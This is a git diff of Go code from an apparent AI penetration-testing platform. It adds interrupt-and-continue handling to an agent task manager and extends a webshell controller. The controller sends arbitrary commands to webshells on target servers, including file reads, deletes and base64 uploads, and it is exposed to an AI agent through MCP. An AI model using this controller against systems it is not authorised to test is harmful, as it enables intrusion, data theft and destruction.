// 调用企业微信 API 主动发送消息
|
||||
h.sendWecomMessageViaAPI(userID, enterpriseID, reply)
|
||||
h.sendWecomMessageViaAPI(rawUserID, enterpriseID, reply)
|
||||
}()
|
||||
}
|
||||
|
||||
|
||||
@@ -3,8 +3,11 @@ package handler
|
||||
import (
|
||||
"context"
|
||||
"errors"
|
||||
"strings"
|
||||
"sync"
|
||||
"time"
|
||||
|
||||
"cyberstrike-ai/internal/multiagent"
|
||||
)
|
||||
|
||||
// ErrTaskCancelled 用户取消任务的错误
|
||||
@@ -13,6 +16,13 @@ var ErrTaskCancelled = errors.New("agent task cancelled by user")
|
||||
// ErrTaskAlreadyRunning 会话已有任务正在执行
|
||||
var ErrTaskAlreadyRunning = errors.New("agent task already running for conversation")
|
||||
|
||||
// shouldPersistEinoAgentTraceAfterRunError:Eino 相关 Run 非成功返回时,是否仍写入 last_react_* 供下轮 loadHistoryFromAgentTrace。
|
||||
// 当前策略:无论正常结束、异常结束或用户主动停止,都尽量保留最后可用轨迹,
|
||||
// 以便在同一会话继续时可基于原始上下文续跑,而不是回退到仅消息文本历史。
|
||||
func shouldPersistEinoAgentTraceAfterRunError(baseCtx context.Context) bool {
|
||||
return true
|
||||
}
|
||||
|
||||
// AgentTask 描述正在运行的Agent任务
|
||||
type AgentTask struct {
|
||||
ConversationID string `json:"conversationId"`
|
||||
@@ -21,9 +31,103 @@ type AgentTask struct {
|
||||
Status string `json:"status"`
|
||||
CancellingAt time.Time `json:"-"` // 进入 cancelling 状态的时间,用于清理长时间卡住的任务
|
||||
|
||||
// ActiveMCPExecutionID 当前正在执行的 MCP 工具 executionId(仅内存,供「中断并继续」= 仅掐当前工具)
|
||||
ActiveMCPExecutionID string `json:"-"`
|
||||
|
||||
// InterruptContinueNote 无 MCP 时「中断并继续」由用户在弹窗中填写的补充说明(Cancel 前写入,续跑轮次读取后清空)
|
||||
InterruptContinueNote string `json:"-"`
|
||||
|
||||
cancel func(error)
|
||||
}
|
||||
|
||||
// RegisterRunningTool 实现 mcp.ToolRunRegistry:工具开始时登记本会话当前 executionId。
|
||||
func (m *AgentTaskManager) RegisterRunningTool(conversationID, executionID string) {
|
||||
conversationID = strings.TrimSpace(conversationID)
|
||||
executionID = strings.TrimSpace(executionID)
|
||||
if conversationID == "" || executionID == "" {
|
||||
return
|
||||
}
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
if t, ok := m.tasks[conversationID]; ok && t != nil {
|
||||
t.ActiveMCPExecutionID = executionID
|
||||
}
|
||||
}
|
||||
|
||||
// UnregisterRunningTool 工具结束时清除登记(仅当 id 仍匹配时清除,避免并发串单)。
|
||||
func (m *AgentTaskManager) UnregisterRunningTool(conversationID, executionID string) {
|
||||
conversationID = strings.TrimSpace(conversationID)
|
||||
executionID = strings.TrimSpace(executionID)
|
||||
if conversationID == "" || executionID == "" {
|
||||
return
|
||||
}
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
if t, ok := m.tasks[conversationID]; ok && t != nil {
|
||||
if t.ActiveMCPExecutionID == executionID {
|
||||
t.ActiveMCPExecutionID = ""
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// SetInterruptContinueNote 在发起 ErrInterruptContinue 取消前写入用户补充说明(仅内存)。
|
||||
func (m *AgentTaskManager) SetInterruptContinueNote(conversationID, note string) {
|
||||
conversationID = strings.TrimSpace(conversationID)
|
||||
if conversationID == "" {
|
||||
return
|
||||
}
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
if t, ok := m.tasks[conversationID]; ok && t != nil {
|
||||
t.InterruptContinueNote = note
|
||||
}
|
||||
}
|
||||
|
||||
// TakeInterruptContinueNote 读取并清空补充说明(续跑开始时调用一次)。
|
||||
func (m *AgentTaskManager) TakeInterruptContinueNote(conversationID string) string {
|
||||
conversationID = strings.TrimSpace(conversationID)
|
||||
if conversationID == "" {
|
||||
return ""
|
||||
}
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
if t, ok := m.tasks[conversationID]; ok && t != nil {
|
||||
n := t.InterruptContinueNote
|
||||
t.InterruptContinueNote = ""
|
||||
return n
|
||||
}
|
||||
return ""
|
||||
}
|
||||
|
||||
// BindTaskCancel 在同一运行任务内替换与 context 绑定的 cancel 函数(用于中断后继续时换新 baseCtx)。
|
||||
func (m *AgentTaskManager) BindTaskCancel(conversationID string, cancel context.CancelCauseFunc) {
|
||||
conversationID = strings.TrimSpace(conversationID)
|
||||
if conversationID == "" || cancel == nil {
|
||||
return
|
||||
}
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
if t, ok := m.tasks[conversationID]; ok && t != nil {
|
||||
t.cancel = func(err error) {
|
||||
cancel(err)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// ActiveMCPExecutionID 返回当前会话进行中的工具 executionId,无则空串。
|
||||
func (m *AgentTaskManager) ActiveMCPExecutionID(conversationID string) string {
|
||||
conversationID = strings.TrimSpace(conversationID)
|
||||
if conversationID == "" {
|
||||
return ""
|
||||
}
|
||||
m.mu.RLock()
|
||||
defer m.mu.RUnlock()
|
||||
if t, ok := m.tasks[conversationID]; ok && t != nil {
|
||||
return strings.TrimSpace(t.ActiveMCPExecutionID)
|
||||
}
|
||||
return ""
|
||||
}
|
||||
|
||||
// CompletedTask 已完成的任务(用于历史记录)
|
||||
type CompletedTask struct {
|
||||
ConversationID string `json:"conversationId"`
|
||||
@@ -155,8 +259,16 @@ func (m *AgentTaskManager) CancelTask(conversationID string, cause error) (bool,
|
||||
return true, nil
|
||||
}
|
||||
|
||||
task.Status = "cancelling"
|
||||
task.CancellingAt = time.Now()
|
||||
// ErrInterruptContinue:仅掐断当前推理步骤,随后由处理器续跑,不进入长时间「取消中」态。
|
||||
if cause != nil && errors.Is(cause, multiagent.ErrInterruptContinue) {
|
||||
task.Status = "running"
|
||||
} else {
|
||||
task.Status = "cancelling"
|
||||
task.CancellingAt = time.Now()
|
||||
}
|
||||
if cause != nil && errors.Is(cause, ErrTaskCancelled) {
|
||||
task.InterruptContinueNote = ""
|
||||
}
|
||||
cancel := task.cancel
|
||||
m.mu.Unlock()
|
||||
|
||||
|
||||
+369
-138
@@ -3,20 +3,302 @@ package handler
|
||||
import (
|
||||
"bytes"
|
||||
"database/sql"
|
||||
"encoding/base64"
|
||||
"encoding/json"
|
||||
"io"
|
||||
"net/http"
|
||||
"net/url"
|
||||
"strings"
|
||||
"time"
|
||||
"unicode/utf8"
|
||||
|
||||
"cyberstrike-ai/internal/database"
|
||||
|
||||
"github.com/gin-gonic/gin"
|
||||
"github.com/google/uuid"
|
||||
"go.uber.org/zap"
|
||||
"golang.org/x/text/encoding/simplifiedchinese"
|
||||
"golang.org/x/text/transform"
|
||||
)
|
||||
|
||||
// webshellSupportedEncodings 允许的 WebShell 响应编码取值(小写,含空串代表 auto)
|
||||
// 仅暴露目前最常见的几种,其他需求可后续扩展(如 Big5、Shift_JIS 等)。
|
||||
var webshellSupportedEncodings = map[string]struct{}{
|
||||
"": {}, // 未配置,按 auto 处理
|
||||
"auto": {},
|
||||
"utf-8": {},
|
||||
"utf8": {},
|
||||
"gbk": {},
|
||||
"gb18030": {},
|
||||
}
|
||||
|
||||
// normalizeWebshellEncoding 归一化编码标识:统一为小写,未知值回退为 auto,供持久化使用
|
||||
func normalizeWebshellEncoding(enc string) string {
|
||||
enc = strings.ToLower(strings.TrimSpace(enc))
|
||||
if _, ok := webshellSupportedEncodings[enc]; !ok {
|
||||
return "auto"
|
||||
}
|
||||
if enc == "" {
|
||||
return "auto"
|
||||
}
|
||||
if enc == "utf8" {
|
||||
return "utf-8"
|
||||
}
|
||||
return enc
|
||||
}
|
||||
|
||||
// decodeWebshellOutput 把 WebShell 返回的字节按指定编码转换为合法 UTF-8 字符串。
|
||||
// 约定:
|
||||
// - "" / "auto":若已是合法 UTF-8 原样返回,否则依次尝试 GB18030(GBK 超集)解码。
|
||||
// - "utf-8" / "utf8":原样返回,非法字节交由 JSON 层按 U+FFFD 处理(保持原有行为)。
|
||||
// - "gbk" / "gb18030":强制按对应编码解码;失败则回退原始字节。
|
||||
//
|
||||
// 该函数对空输入直接返回空串,避免不必要的转换。
|
||||
func decodeWebshellOutput(raw []byte, encoding string) string {
|
||||
if len(raw) == 0 {
|
||||
return ""
|
||||
}
|
||||
enc := normalizeWebshellEncoding(encoding)
|
||||
switch enc {
|
||||
case "utf-8":
|
||||
return string(raw)
|
||||
case "gbk":
|
||||
if out, _, err := transform.Bytes(simplifiedchinese.GBK.NewDecoder(), raw); err == nil {
|
||||
return string(out)
|
||||
}
|
||||
return string(raw)
|
||||
case "gb18030":
|
||||
if out, _, err := transform.Bytes(simplifiedchinese.GB18030.NewDecoder(), raw); err == nil {
|
||||
return string(out)
|
||||
}
|
||||
return string(raw)
|
||||
default: // auto
|
||||
if utf8.Valid(raw) {
|
||||
return string(raw)
|
||||
}
|
||||
// GB18030 是 GBK 的超集,覆盖范围最广,auto 模式统一用它兜底
|
||||
if out, _, err := transform.Bytes(simplifiedchinese.GB18030.NewDecoder(), raw); err == nil {
|
||||
return string(out)
|
||||
}
|
||||
return string(raw)
|
||||
}
|
||||
}
|
||||
|
||||
// webshellSupportedOS 允许的 WebShell 目标操作系统(小写,空串代表 auto)
|
||||
var webshellSupportedOS = map[string]struct{}{
|
||||
"": {},
|
||||
"auto": {},
|
||||
"linux": {},
|
||||
"windows": {},
|
||||
}
|
||||
|
||||
// normalizeWebshellOS 归一化 OS 标识,未知值回退为 auto,供持久化使用
|
||||
func normalizeWebshellOS(osTag string) string {
|
||||
osTag = strings.ToLower(strings.TrimSpace(osTag))
|
||||
if _, ok := webshellSupportedOS[osTag]; !ok {
|
||||
return "auto"
|
||||
}
|
||||
if osTag == "" {
|
||||
return "auto"
|
||||
}
|
||||
return osTag
|
||||
}
|
||||
|
||||
// resolveWebshellOS 根据连接的 os 与 shellType 推断最终目标 OS(仅返回 "linux" 或 "windows")。
|
||||
// 规则:
|
||||
// - 显式 linux / windows:按用户选择。
|
||||
// - auto 或未知:asp/aspx → windows,其他 → linux。保持历史行为,平滑向后兼容。
|
||||
func resolveWebshellOS(osTag, shellType string) string {
|
||||
osTag = strings.ToLower(strings.TrimSpace(osTag))
|
||||
switch osTag {
|
||||
case "linux":
|
||||
return "linux"
|
||||
case "windows":
|
||||
return "windows"
|
||||
}
|
||||
t := strings.ToLower(strings.TrimSpace(shellType))
|
||||
if t == "asp" || t == "aspx" {
|
||||
return "windows"
|
||||
}
|
||||
return "linux"
|
||||
}
|
||||
|
||||
// quoteCmdPath 把路径按 Windows cmd.exe 规则转义。
|
||||
// 使用双引号包裹,内部双引号转义为 ""(cmd 接受的写法)。
|
||||
func quoteCmdPath(p string) string {
|
||||
if p == "" {
|
||||
return "\".\""
|
||||
}
|
||||
return "\"" + strings.ReplaceAll(p, "\"", "\"\"") + "\""
|
||||
}
|
||||
|
||||
// quotePsSingle 把字符串按 PowerShell 单引号字符串规则转义(内部 ' → '')。
|
||||
// 供 PowerShell 脚本参数使用,全脚本只用单引号,外层 cmd 再用双引号包裹即可安全传递。
|
||||
func quotePsSingle(s string) string {
|
||||
return "'" + strings.ReplaceAll(s, "'", "''") + "'"
|
||||
}
|
||||
|
||||
// quoteShellSinglePosix 把路径按 POSIX sh 单引号规则转义(内部 ' → '\'')
|
||||
func quoteShellSinglePosix(p string) string {
|
||||
if p == "" {
|
||||
return "."
|
||||
}
|
||||
return "'" + strings.ReplaceAll(p, "'", "'\\''") + "'"
|
||||
}
|
||||
|
||||
// quoteWebshellPath 按目标 OS 选择转义方案:Linux 用 POSIX 单引号,Windows 用 cmd 双引号
|
||||
func quoteWebshellPath(path, osTag string) string {
|
||||
if resolveWebshellOS(osTag, "") == "windows" {
|
||||
return quoteCmdPath(path)
|
||||
}
|
||||
return quoteShellSinglePosix(path)
|
||||
}
|
||||
|
||||
// buildWindowsPowerShellWrite 构造 Windows 端把 base64 内容一次性写入目标路径的 cmd 命令。
|
||||
// 外层走 cmd.exe 的 powershell 调用,PowerShell 脚本里只用单引号字符串,避免嵌套引号陷阱。
|
||||
func buildWindowsPowerShellWrite(path, b64 string) string {
|
||||
script := "$b=[Convert]::FromBase64String(" + quotePsSingle(b64) + ");" +
|
||||
"[IO.File]::WriteAllBytes(" + quotePsSingle(path) + ",$b)"
|
||||
return "powershell -NoProfile -NonInteractive -Command \"" + script + "\""
|
||||
}
|
||||
|
||||
// buildWindowsPowerShellAppend 构造 Windows 端把 base64 内容追加写入目标路径的 cmd 命令(用于分块上传)
|
||||
func buildWindowsPowerShellAppend(path, b64 string) string {
|
||||
script := "$b=[Convert]::FromBase64String(" + quotePsSingle(b64) + ");" +
|
||||
"$f=[IO.File]::Open(" + quotePsSingle(path) + ",[IO.FileMode]::Append,[IO.FileAccess]::Write,[IO.FileShare]::None);" +
|
||||
"try{$f.Write($b,0,$b.Length)}finally{$f.Close()}"
|
||||
return "powershell -NoProfile -NonInteractive -Command \"" + script + "\""
|
||||
}
|
||||
|
||||
// fileCommandInput 封装 buildFileCommand 的输入,避免长参数列表
|
||||
type fileCommandInput struct {
|
||||
Action string
|
||||
Path string
|
||||
TargetPath string
|
||||
Content string
|
||||
ChunkIndex int
|
||||
OS string
|
||||
ShellType string
|
||||
}
|
||||
|
||||
// buildFileCommand 根据目标 OS 与文件操作类型生成具体的远端命令字符串。
|
||||
// 同一份实现供 HTTP 入口(FileOp)与 MCP 入口(FileOpWithConnection)共用,避免双份维护。
|
||||
// 返回值第二位是用户可见的业务错误(如 "path is required")。
|
||||
func (h *WebShellHandler) buildFileCommand(in fileCommandInput) (string, error) {
|
||||
targetOS := resolveWebshellOS(in.OS, in.ShellType)
|
||||
action := strings.ToLower(strings.TrimSpace(in.Action))
|
||||
path := strings.TrimSpace(in.Path)
|
||||
|
||||
switch action {
|
||||
case "list":
|
||||
p := path
|
||||
if p == "" {
|
||||
p = "."
|
||||
}
|
||||
if targetOS == "windows" {
|
||||
return "dir /a " + quoteCmdPath(p), nil
|
||||
}
|
||||
return "ls -la " + quoteShellSinglePosix(p), nil
|
||||
|
||||
case "read":
|
||||
if path == "" {
|
||||
return "", errFileOpPathRequired
|
||||
}
|
||||
if targetOS == "windows" {
|
||||
return "type " + quoteCmdPath(path), nil
|
||||
}
|
||||
return "cat " + quoteShellSinglePosix(path), nil
|
||||
|
||||
case "delete":
|
||||
if path == "" {
|
||||
return "", errFileOpPathRequired
|
||||
}
|
||||
if targetOS == "windows" {
|
||||
return "del /q /f " + quoteCmdPath(path), nil
|
||||
}
|
||||
return "rm -f " + quoteShellSinglePosix(path), nil
|
||||
|
||||
case "mkdir":
|
||||
if path == "" {
|
||||
return "", errFileOpPathRequired
|
||||
}
|
||||
if targetOS == "windows" {
|
||||
// cmd 的 md 默认会自动创建中间目录(等价于 Linux 的 mkdir -p)
|
||||
return "md " + quoteCmdPath(path), nil
|
||||
}
|
||||
return "mkdir -p " + quoteShellSinglePosix(path), nil
|
||||
|
||||
case "rename":
|
||||
oldPath := path
|
||||
newPath := strings.TrimSpace(in.TargetPath)
|
||||
if oldPath == "" || newPath == "" {
|
||||
return "", errFileOpRenameNeedsBothPaths
|
||||
}
|
||||
if targetOS == "windows" {
|
||||
return "move /y " + quoteCmdPath(oldPath) + " " + quoteCmdPath(newPath), nil
|
||||
}
|
||||
return "mv -f " + quoteShellSinglePosix(oldPath) + " " + quoteShellSinglePosix(newPath), nil
|
||||
|
||||
case "write":
|
||||
if path == "" {
|
||||
return "", errFileOpPathRequired
|
||||
}
|
||||
// 统一策略:先把内容 base64 编码,再用目标平台对应方式解码写回,
|
||||
// 这样既能写入任意二进制/含引号的文本,又避免各家 shell 的转义地狱。
|
||||
b64 := base64.StdEncoding.EncodeToString([]byte(in.Content))
|
||||
if targetOS == "windows" {
|
||||
return buildWindowsPowerShellWrite(path, b64), nil
|
||||
}
|
||||
return "echo '" + b64 + "' | base64 -d > " + quoteShellSinglePosix(path), nil
|
||||
|
||||
case "upload":
|
||||
if path == "" {
|
||||
return "", errFileOpPathRequired
|
||||
}
|
||||
if len(in.Content) > 512*1024 {
|
||||
return "", errFileOpUploadTooLarge
|
||||
}
|
||||
if targetOS == "windows" {
|
||||
return buildWindowsPowerShellWrite(path, in.Content), nil
|
||||
}
|
||||
return "echo '" + in.Content + "' | base64 -d > " + quoteShellSinglePosix(path), nil
|
||||
|
||||
case "upload_chunk":
|
||||
if path == "" {
|
||||
return "", errFileOpPathRequired
|
||||
}
|
||||
if targetOS == "windows" {
|
||||
if in.ChunkIndex == 0 {
|
||||
return buildWindowsPowerShellWrite(path, in.Content), nil
|
||||
}
|
||||
return buildWindowsPowerShellAppend(path, in.Content), nil
|
||||
}
|
||||
redir := ">>"
|
||||
if in.ChunkIndex == 0 {
|
||||
redir = ">"
|
||||
}
|
||||
return "echo '" + in.Content + "' | base64 -d " + redir + " " + quoteShellSinglePosix(path), nil
|
||||
}
|
||||
|
||||
return "", errFileOpUnsupportedAction(action)
|
||||
}
|
||||
|
||||
// 业务错误常量,便于上层统一返回用户可见提示
|
||||
var (
|
||||
errFileOpPathRequired = simpleError("path is required")
|
||||
errFileOpRenameNeedsBothPaths = simpleError("path and target_path are required for rename")
|
||||
errFileOpUploadTooLarge = simpleError("upload content too large (max 512KB base64)")
|
||||
)
|
||||
|
||||
func errFileOpUnsupportedAction(action string) error {
|
||||
return simpleError("unsupported action: " + action)
|
||||
}
|
||||
|
||||
// simpleError 是不带堆栈的轻量错误类型,供 buildFileCommand 报可预期的参数校验错误
|
||||
type simpleError string
|
||||
|
||||
func (e simpleError) Error() string { return string(e) }
|
||||
|
||||
// WebShellHandler 代理执行 WebShell 命令(类似冰蝎/蚁剑),避免前端跨域并统一构建请求
|
||||
type WebShellHandler struct {
|
||||
logger *zap.Logger
|
||||
@@ -44,6 +326,8 @@ type CreateConnectionRequest struct {
|
||||
Method string `json:"method"`
|
||||
CmdParam string `json:"cmd_param"`
|
||||
Remark string `json:"remark"`
|
||||
Encoding string `json:"encoding"`
|
||||
OS string `json:"os"`
|
||||
}
|
||||
|
||||
// UpdateConnectionRequest 更新连接请求
|
||||
@@ -54,6 +338,8 @@ type UpdateConnectionRequest struct {
|
||||
Method string `json:"method"`
|
||||
CmdParam string `json:"cmd_param"`
|
||||
Remark string `json:"remark"`
|
||||
Encoding string `json:"encoding"`
|
||||
OS string `json:"os"`
|
||||
}
|
||||
|
||||
// ListConnections 列出所有 WebShell 连接(GET /api/webshell/connections)
|
||||
@@ -109,6 +395,8 @@ func (h *WebShellHandler) CreateConnection(c *gin.Context) {
|
||||
Method: method,
|
||||
CmdParam: strings.TrimSpace(req.CmdParam),
|
||||
Remark: strings.TrimSpace(req.Remark),
|
||||
Encoding: normalizeWebshellEncoding(req.Encoding),
|
||||
OS: normalizeWebshellOS(req.OS),
|
||||
CreatedAt: time.Now(),
|
||||
}
|
||||
if err := h.db.CreateWebshellConnection(conn); err != nil {
|
||||
@@ -159,6 +447,8 @@ func (h *WebShellHandler) UpdateConnection(c *gin.Context) {
|
||||
Method: method,
|
||||
CmdParam: strings.TrimSpace(req.CmdParam),
|
||||
Remark: strings.TrimSpace(req.Remark),
|
||||
Encoding: normalizeWebshellEncoding(req.Encoding),
|
||||
OS: normalizeWebshellOS(req.OS),
|
||||
}
|
||||
if err := h.db.UpdateWebshellConnection(conn); err != nil {
|
||||
if err == sql.ErrNoRows {
|
||||
@@ -331,6 +621,8 @@ type ExecRequest struct {
|
||||
Type string `json:"type"` // php, asp, aspx, jsp, custom
|
||||
Method string `json:"method"` // GET 或 POST,空则默认 POST
|
||||
CmdParam string `json:"cmd_param"` // 命令参数名,如 cmd/xxx,空则默认 cmd
|
||||
Encoding string `json:"encoding"` // 响应编码:auto / utf-8 / gbk / gb18030,空则 auto
|
||||
OS string `json:"os"` // 目标操作系统:auto / linux / windows,当前 exec 不用它,保留字段便于未来扩展
|
||||
Command string `json:"command" binding:"required"`
|
||||
}
|
||||
|
||||
@@ -344,23 +636,27 @@ type ExecResponse struct {
|
||||
|
||||
// FileOpRequest 文件操作请求
|
||||
type FileOpRequest struct {
|
||||
URL string `json:"url" binding:"required"`
|
||||
Password string `json:"password"`
|
||||
Type string `json:"type"`
|
||||
Method string `json:"method"` // GET 或 POST,空则默认 POST
|
||||
CmdParam string `json:"cmd_param"` // 命令参数名,如 cmd/xxx,空则默认 cmd
|
||||
Action string `json:"action" binding:"required"` // list, read, delete, write, mkdir, rename, upload, upload_chunk
|
||||
Path string `json:"path"`
|
||||
TargetPath string `json:"target_path"` // rename 时目标路径
|
||||
Content string `json:"content"` // write/upload 时使用
|
||||
ChunkIndex int `json:"chunk_index"` // upload_chunk 时,0 表示首块
|
||||
URL string `json:"url" binding:"required"`
|
||||
Password string `json:"password"`
|
||||
Type string `json:"type"`
|
||||
Method string `json:"method"` // GET 或 POST,空则默认 POST
|
||||
CmdParam string `json:"cmd_param"` // 命令参数名,如 cmd/xxx,空则默认 cmd
|
||||
Encoding string `json:"encoding"` // 响应编码:auto / utf-8 / gbk / gb18030,空则 auto
|
||||
OS string `json:"os"` // 目标操作系统:auto / linux / windows,空则按 shellType 推断
|
||||
ConnectionID string `json:"connection_id,omitempty"` // 可选:连接 ID;服务端探活出 OS 后会回写到此连接
|
||||
Action string `json:"action" binding:"required"` // list, read, delete, write, mkdir, rename, upload, upload_chunk
|
||||
Path string `json:"path"`
|
||||
TargetPath string `json:"target_path"` // rename 时目标路径
|
||||
Content string `json:"content"` // write/upload 时使用
|
||||
ChunkIndex int `json:"chunk_index"` // upload_chunk 时,0 表示首块
|
||||
}
|
||||
|
||||
// FileOpResponse 文件操作响应
|
||||
type FileOpResponse struct {
|
||||
OK bool `json:"ok"`
|
||||
Output string `json:"output"`
|
||||
Error string `json:"error,omitempty"`
|
||||
OK bool `json:"ok"`
|
||||
Output string `json:"output"`
|
||||
Error string `json:"error,omitempty"`
|
||||
DetectedOS string `json:"detected_os,omitempty"` // 仅在 auto 模式且探活成功时返回,前端应更新本地缓存
|
||||
}
|
||||
|
||||
func (h *WebShellHandler) Exec(c *gin.Context) {
|
||||
@@ -415,7 +711,7 @@ func (h *WebShellHandler) Exec(c *gin.Context) {
|
||||
if readErr != nil {
|
||||
h.logger.Warn("webshell exec read body", zap.Error(readErr))
|
||||
}
|
||||
output := string(out)
|
||||
output := decodeWebshellOutput(out, req.Encoding)
|
||||
httpCode := resp.StatusCode
|
||||
|
||||
c.JSON(http.StatusOK, ExecResponse{
|
||||
@@ -474,83 +770,32 @@ func (h *WebShellHandler) FileOp(c *gin.Context) {
|
||||
return
|
||||
}
|
||||
|
||||
// 通过执行系统命令实现文件操作(与通用一句话兼容)
|
||||
var command string
|
||||
shellType := strings.ToLower(strings.TrimSpace(req.Type))
|
||||
switch req.Action {
|
||||
case "list":
|
||||
path := strings.TrimSpace(req.Path)
|
||||
if path == "" {
|
||||
path = "."
|
||||
// 若 OS 未显式配置,先发一次探活命令,识别出真实 OS 再构造文件操作命令。
|
||||
// 这解决了 "Windows + PHP + OS=auto" 场景下旧 fallback 错发 `ls -la` 导致目录列不出来的问题。
|
||||
osTag := req.OS
|
||||
detectedOS := ""
|
||||
if normalizeWebshellOS(osTag) == "auto" {
|
||||
if probed := probeWebshellOSViaExec(h.newHTTPExecFn(req.URL, req.Password, req.Type, req.Method, req.CmdParam, req.Encoding)); probed != "" {
|
||||
osTag = probed
|
||||
detectedOS = probed
|
||||
// 若前端带了 connection_id,顺带把探活结果持久化到该连接,后续刷新零成本
|
||||
if cid := strings.TrimSpace(req.ConnectionID); cid != "" {
|
||||
h.persistDetectedOS(cid, probed)
|
||||
}
|
||||
}
|
||||
if shellType == "asp" || shellType == "aspx" {
|
||||
command = "dir " + h.escapePath(path)
|
||||
} else {
|
||||
command = "ls -la " + h.escapePath(path)
|
||||
}
|
||||
case "read":
|
||||
if shellType == "asp" || shellType == "aspx" {
|
||||
command = "type " + h.escapePath(strings.TrimSpace(req.Path))
|
||||
} else {
|
||||
command = "cat " + h.escapePath(strings.TrimSpace(req.Path))
|
||||
}
|
||||
case "delete":
|
||||
if shellType == "asp" || shellType == "aspx" {
|
||||
command = "del " + h.escapePath(strings.TrimSpace(req.Path))
|
||||
} else {
|
||||
command = "rm -f " + h.escapePath(strings.TrimSpace(req.Path))
|
||||
}
|
||||
case "write":
|
||||
path := h.escapePath(strings.TrimSpace(req.Path))
|
||||
command = "echo " + h.escapeForEcho(req.Content) + " > " + path
|
||||
case "mkdir":
|
||||
path := strings.TrimSpace(req.Path)
|
||||
if path == "" {
|
||||
c.JSON(http.StatusBadRequest, FileOpResponse{OK: false, Error: "path is required for mkdir"})
|
||||
return
|
||||
}
|
||||
if shellType == "asp" || shellType == "aspx" {
|
||||
command = "md " + h.escapePath(path)
|
||||
} else {
|
||||
command = "mkdir -p " + h.escapePath(path)
|
||||
}
|
||||
case "rename":
|
||||
oldPath := strings.TrimSpace(req.Path)
|
||||
newPath := strings.TrimSpace(req.TargetPath)
|
||||
if oldPath == "" || newPath == "" {
|
||||
c.JSON(http.StatusBadRequest, FileOpResponse{OK: false, Error: "path and target_path are required for rename"})
|
||||
return
|
||||
}
|
||||
if shellType == "asp" || shellType == "aspx" {
|
||||
command = "move /y " + h.escapePath(oldPath) + " " + h.escapePath(newPath)
|
||||
} else {
|
||||
command = "mv " + h.escapePath(oldPath) + " " + h.escapePath(newPath)
|
||||
}
|
||||
case "upload":
|
||||
path := strings.TrimSpace(req.Path)
|
||||
if path == "" {
|
||||
c.JSON(http.StatusBadRequest, FileOpResponse{OK: false, Error: "path is required for upload"})
|
||||
return
|
||||
}
|
||||
if len(req.Content) > 512*1024 {
|
||||
c.JSON(http.StatusBadRequest, FileOpResponse{OK: false, Error: "upload content too large (max 512KB base64)"})
|
||||
return
|
||||
}
|
||||
// base64 仅含 A-Za-z0-9+/=,用单引号包裹安全
|
||||
command = "echo " + "'" + req.Content + "'" + " | base64 -d > " + h.escapePath(path)
|
||||
case "upload_chunk":
|
||||
path := strings.TrimSpace(req.Path)
|
||||
if path == "" {
|
||||
c.JSON(http.StatusBadRequest, FileOpResponse{OK: false, Error: "path is required for upload_chunk"})
|
||||
return
|
||||
}
|
||||
redir := ">>"
|
||||
if req.ChunkIndex == 0 {
|
||||
redir = ">"
|
||||
}
|
||||
command = "echo " + "'" + req.Content + "'" + " | base64 -d " + redir + " " + h.escapePath(path)
|
||||
default:
|
||||
c.JSON(http.StatusBadRequest, FileOpResponse{OK: false, Error: "unsupported action: " + req.Action})
|
||||
}
|
||||
|
||||
command, cmdErr := h.buildFileCommand(fileCommandInput{
|
||||
Action: req.Action,
|
||||
Path: req.Path,
|
||||
TargetPath: req.TargetPath,
|
||||
Content: req.Content,
|
||||
ChunkIndex: req.ChunkIndex,
|
||||
OS: osTag,
|
||||
ShellType: req.Type,
|
||||
})
|
||||
if cmdErr != nil {
|
||||
c.JSON(http.StatusBadRequest, FileOpResponse{OK: false, Error: cmdErr.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
@@ -585,27 +830,15 @@ func (h *WebShellHandler) FileOp(c *gin.Context) {
|
||||
if readErr != nil {
|
||||
h.logger.Warn("webshell fileop read body", zap.Error(readErr))
|
||||
}
|
||||
output := string(out)
|
||||
output := decodeWebshellOutput(out, req.Encoding)
|
||||
|
||||
c.JSON(http.StatusOK, FileOpResponse{
|
||||
OK: resp.StatusCode == http.StatusOK,
|
||||
Output: output,
|
||||
OK: resp.StatusCode == http.StatusOK,
|
||||
Output: output,
|
||||
DetectedOS: detectedOS,
|
||||
})
|
||||
}
|
||||
|
||||
func (h *WebShellHandler) escapePath(p string) string {
|
||||
if p == "" {
|
||||
return "."
|
||||
}
|
||||
// 简单转义空格与敏感字符,避免命令注入
|
||||
return "'" + strings.ReplaceAll(p, "'", "'\\''") + "'"
|
||||
}
|
||||
|
||||
func (h *WebShellHandler) escapeForEcho(s string) string {
|
||||
// 仅用于 write:base64 写入更安全,这里简单用单引号包裹
|
||||
return "'" + strings.ReplaceAll(s, "'", "'\"'\"'") + "'"
|
||||
}
|
||||
|
||||
// ExecWithConnection 在指定 WebShell 连接上执行命令(供 MCP/Agent 等非 HTTP 调用)
|
||||
func (h *WebShellHandler) ExecWithConnection(conn *database.WebShellConnection, command string) (output string, ok bool, errMsg string) {
|
||||
if conn == nil {
|
||||
@@ -643,7 +876,7 @@ func (h *WebShellHandler) ExecWithConnection(conn *database.WebShellConnection,
|
||||
if readErr != nil {
|
||||
h.logger.Warn("webshell ExecWithConnection read body", zap.Error(readErr))
|
||||
}
|
||||
return string(out), resp.StatusCode == http.StatusOK, ""
|
||||
return decodeWebshellOutput(out, conn.Encoding), resp.StatusCode == http.StatusOK, ""
|
||||
}
|
||||
|
||||
// FileOpWithConnection 在指定 WebShell 连接上执行文件操作(供 MCP/Agent 调用),支持 list / read / write
|
||||
@@ -652,40 +885,38 @@ func (h *WebShellHandler) FileOpWithConnection(conn *database.WebShellConnection
|
||||
return "", false, "connection is nil"
|
||||
}
|
||||
action = strings.ToLower(strings.TrimSpace(action))
|
||||
shellType := strings.ToLower(strings.TrimSpace(conn.Type))
|
||||
if shellType == "" {
|
||||
shellType = "php"
|
||||
}
|
||||
var command string
|
||||
// MCP 入口仅开放 list / read / write 三种动作,与工具文档的承诺保持一致
|
||||
switch action {
|
||||
case "list":
|
||||
if path == "" {
|
||||
path = "."
|
||||
}
|
||||
if shellType == "asp" || shellType == "aspx" {
|
||||
command = "dir " + h.escapePath(strings.TrimSpace(path))
|
||||
} else {
|
||||
command = "ls -la " + h.escapePath(strings.TrimSpace(path))
|
||||
}
|
||||
case "read":
|
||||
